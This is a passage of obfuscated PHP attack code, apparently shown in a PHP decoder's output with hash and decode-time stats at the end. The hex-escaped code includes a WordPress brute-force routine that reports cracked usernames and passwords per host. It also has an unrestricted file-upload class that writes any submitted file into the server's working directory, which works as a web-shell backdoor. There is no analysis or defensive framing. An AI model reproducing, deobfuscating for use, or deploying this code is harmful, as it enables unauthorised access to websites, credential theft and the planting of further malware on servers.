s="u\x73\x65\x72\x6e\x61\x6de";${${"G\x4cOB\x41L\x53"}["\x6b\x66r\x7ab\x73\x78\x67\x68\x6dsy"]}=1;echo"<\x683\x3e".$host." \x3d>\x20Us\x65r\x4eame\x20:\x20[\x3c\x66o\x6e\x74\x20\x63olo\x72=\x27g\x72ee\x6e\x27>".${$odukywdohss}."</f\x6f\x6et>]\x20:\x20P\x61\x73\x73\x77o\x72\x64 : [<\x66\x6f\x6et c\x6flo\x72='gre\x65\x6e\x27\x3e".${$clkpnkgxow}."</\x66on\x74>]</h3>";ob_flush();flush();break;}}if(${${"G\x4cO\x42\x41\x4c\x53"}["g\x6e\x65\x69s\x68\x76\x67\x6aqju"]}==1){break;}}if(${$gzmeblohlqxg}==0){echo"\x3ch3\x3e".$host." =\x3e <\x66\x6fnt c\x6f\x6c\x6fr='r\x65d'\x3eFa\x69\x6c\x65\x64\x20!\x3c/fo\x6et\x3e</h\x33>";ob_flush();flush();}}}else{echo"\x3ch3><\x66\x6fn\x74\x20\x63ol\x6f\x72\x3d'r\x65\x64'\x3eA\x6c\x6c\x20\x66\x69elds a\x72e R\x65qui\x72e\x64 \x21\x3c/f\x6f\x6et>\x3c/h3\x3e";}}echo"</t\x64\x3e\x3c/tr\x3e\n</\x74ab\x6ce>\x3c/\x66\x6fr\x6d\x3e\n\n\x3c!-- W\x6f\x72d\x70\x72\x65ss \x42\x72\x75\x74e F\x6f\x72\x63\x65\x20 -->\n\n</\x63\x65\x6ete\x72>\n\x3cp>\n";function url_exists($strURL){${"\x47\x4c\x4f\x42AL\x53"}["fhw\x78\x64\x78\x68\x79\x65j\x6d"]="\x69\x6e\x74R\x65\x74u\x72nCo\x64\x65";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6ev\x63kn\x76m"]="re\x73\x55\x52\x4c";$nfwxfn="\x72\x65\x73\x55RL";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x66\x6bq\x71ml\x6b\x75"]}=curl_init();${"GL\x4f\x42A\x4cS"}["\x65\x77\x6dd\x74\x6a\x79"]="\x72e\x73\x55\x52\x4c";curl_setopt(${${"\x47L\x4f\x42\x41L\x53"}["n\x76\x63k\x6e\x76m"]},CURLOPT_URL,${${"G\x4c\x4f\x42\x41LS"}["\x6af\x75\x6e\x6b\x6a\x68o\x6c\x72\x64"]});${"\x47\x4c\x4f\x42\x41\x4c\x53"}["m\x76\x66\x66me\x6dv\x78"]="r\x65s\x55\x52\x4c";curl_setopt(${${"\x47LOB\x41L\x53"}["\x65wmdt\x6ay"]},CURLOPT_BINARYTRANSFER,1);curl_setopt(${${"GL\x4fBA\x4cS"}["rf\x6b\x71\x71\x6dl\x6b\x75"]},CURLOPT_HEADERFUNCTION,"c\x75r\x6c\x48\x65\x61\x64e\x72C\x61ll\x62\x61ck");curl_setopt(${$nfwxfn},CURLOPT_FAILONERROR,1);curl_exec(${${"\x47\x4cO\x42ALS"}["\x72\x66\x6b\x71\x71\x6d\x6c\x6b\x75"]});${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x66h\x77\x78d\x78\x68\x79\x65\x6a\x6d"]}=curl_getinfo(${${"\x47L\x4f\x42\x41L\x53"}["r\x66\x6b\x71\x71m\x6c\x6b\x75"]},CURLINFO_HTTP_CODE);curl_close(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x76ff\x6d\x65\x6d\x76\x78"]});if(${${"GLO\x42\x41LS"}["\x70pzkqh\x73\x77\x6b\x61l"]}!=200){return false;}else{return true;}}function filter($string){if(get_magic_quotes_gpc()!=0){return stripslashes(${${"\x47L\x4f\x42\x41LS"}["g\x7au\x62p\x70\x72i\x68\x66"]});}else{return${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x7a\x75\x62\x70\x70\x72\x69h\x66"]};}}function RemoveLastSlash($host){if(strrpos($host,"/",-1)==strlen($host)-1){return substr($host,0,strrpos($host,"/",-1));}else{return$host;}}echo" \n\x3c/p>\n<\x68\x33\x3e<p>p\x6fw\x65\x72\x65d \x62y\x20\x3c\x61\x20\x68r\x65f=\x22\x68t\x74\x70s://\x77\x77\x77.\x66\x61\x63e\x62\x6fok.com/pi\x73h\x65rhac\x6b\x22\x3e\x3cfon\x74\x20c\x6f\x6c\x6fr=\"\x62l\x61c\x6b\"\x3eP\x69\x73\x68\x65r_Bla\x63\x6b\x3c/\x61\x3e\x3c/p\x3e</\x68\x33\x3e\n</c\x65\x6et\x65r>\n<\x70\x3e\n\n";${${"GLO\x42A\x4c\x53"}["\x75\x78\x6e\x69\x6e\x63d\x76\x62"]}=new maxUpload();$myUpload->uploadFile();class maxUpload{var$uploadLocation;function maxUpload(){$this->uploadLocation=getcwd().DIRECTORY_SEPARATOR;}function setUploadLocation($dir){$this->uploadLocation=${${"\x47\x4cO\x42\x41L\x53"}["q\x63\x68\x62\x79oq\x75o\x62u"]};}function showUploadForm($msg='',$error=''){${"G\x4c\x4f\x42\x41\x4cS"}["\x6c\x6dc\x6b\x74f\x69b"]="\x6ds\x67";if(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x6d\x63\x6b\x74\x66i\x62"]}!=""){$mxsiglvv="\x6dsg";echo"\x3cp\x20\x63\x6ca\x73s\x3d\x22\x6dsg\"\x3e".${$mxsiglvv}."\x3c/\x70>";}else if(${${"G\x4c\x4fB\x41\x4cS"}["v\x68mvds\x75x\x6f\x62de"]}!=""){$msfuyeq="erro\x72";echo"\x3cp c\x6cas\x73\x3d\"emsg\"\x3e".${$msfuyeq}."\x3c/p\x3e";}echo"\x20\x20 \x20\x20\x20 \x20 \x20 \x20\x20\x3cfo\x72\x6d ac\x74ion=\"\x22 \x6de\x74\x68o\x64=\x22\x70\x6fst\" e\x6e\x63t\x79\x70\x65=\"\x6du\x6ct\x69pa\x72t/\x66\x6fr\x6d-\x64\x61\x74a\"\x20\x3e\n \x20\x20\x20\x20\x20 \x20 \x20 \x20\x20 \x20 \x20 \x3c\x63\x65nter>\n\x20 \x20\x20\x20 \x20\x20\x20 \x20\x20\x20\x20\x20 \x20\x20\x20 <\x69\x6e\x70ut\x20na\x6d\x65=\"myfil\x65\x22 type\x3d\"\x66\x69l\x65\"\x20\x73ize=\x22\x33\x30\" />\n \x20 \x20\x20 \x20 \x20\x20 \x20 \x20 \x20 \x20 </l\x61\x62el>\n\x20\x20\x20 \x20\x20 \x20 \x20\x20 \x20 \x20 \x20\x20 \x20\x20\x20\x20<la\x62el\x3e\n \x20\x20 \x20 \x20 \x20\x20\x20\x20 \x20 \x20\x20<\x69\x6ep\x75t \x74\x79pe\x3d\x22submi\x74\x22\x20\x6e\x61\x6d\x65=\x22s\x75\x62\x6d\x69t\x42\x74\x6e\x22 \x63\x6ca\x73s=\x22sb\x74\x6e\x22 va\x6c\x75e=\x22\x55p\x6coad\x22\x20/\x3e\n \x20\x20\x20\x20 \x20\x20 \x20\x20\x20 \x20\x20\x20 \x20\x20\x3c/l\x61bel>\n \x20 \x20\x20 \x20\x20\x20\x20\x20 \x20 \x20 \x20 \x3c/\x63ent\x65\x72\x3e\n\x20 \x20 \x20\x20\x20 \x20\x20\x20\x20\x20 \x3c/fo\x72\x6d>\n\x20 \x20 \x20 \x20 </d\x69\x76>\n\x20\x20 \x20 \x20\x20 \n";}function uploadFile(){if(!isset($_POST["s\x75bm\x69\x74Btn"])){$this->showUploadForm();}else{${${"\x47LOBA\x4c\x53"}["\x6e\x77w\x66\x75\x76\x77\x6f"]}="";${"\x47\x4c\x4fBAL\x53"}["qnv\x65\x64d\x6e"]="\x65rr\x6fr";${"GL\x4fB\x41L\x53"}["h\x7a\x6cvgm\x6b\x62v\x67"]="m\x73\x67";${${"GLO\x42AL\x53"}["\x71\x6eve\x64\x64n"]}="";$vxavnwfm="\x65\x72\x72or";if(!file_exists($this->uploadLocation)){${${"GL\x4f\x42A\x4c\x53"}["\x76\x68mv\x64\x73\x75xo\x62d\x65"]}="T\x68\x65 \x74\x61rget \x64\x69\x72ec\x74ory\x20\x64\x6f\x65sn\x27t\x20\x65xi\x73ts\x21";}else if(!is_writeable($this->uploadLocation)){${${"\x47L\x4f\x42\x41LS"}["vh\x6d\x76d\x73\x75\x78o\x62\x64\x65"]}="\x54\x68\x65\x20tar\x67\x65t \x64i\x72\x65c\x74or\x79\x20is\x20n\x6f\x74 w\x72\x69\x74e\x61\x62le\x21";}else{${"GL\x4f\x42A\x4c\x53"}["f\x6e\x6e\x73n\x72\x68x\x76\x75\x78\x67"]="\x74\x61rg\x65\x74_p\x61\x74h";${${"\x47\x4cOBA\x4cS"}["\x75\x71\x76\x70\x63h"]}=$this->uploadLocation.basename($_FILES["\x6dy\x66\x69le"]["na\x6d\x65"]);if(@move_uploaded_file($_FILES["\x6dyfil\x65"]["t\x6dp\x5fnam\x65"],${${"\x47\x4c\x4fB\x41\x4cS"}["\x66\x6e\x6e\x73n\x72h\x78v\x75xg"]})){${${"G\x4c\x4f\x42\x41\x4cS"}["nw\x77fu\x76\x77o"]}=basename($_FILES["my\x66\x69\x6ce"]["n\x61\x6d\x65"])." \x77a\x73 u\x70lo\x61\x64\x65\x64\x20succ\x65s\x73fully!";}else{$pmokegdkrh="\x65r\x72\x6f\x72";${$pmokegdkrh}="T\x68\x65\x20\x75p\x6coad \x70r\x6fce\x73s\x20\x66a\x69\x6c\x65d\x21";}}$this->showUploadForm(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68z\x6c\x76\x67\x6dk\x62v\x67"]},${$vxavnwfm});}}}
?>
Function Calls
| None |
Stats
| MD5 | f665fbcc5684ed2710246f7c8a2a5280 |
| Eval Count | 0 |
| Decode Time | 125 ms |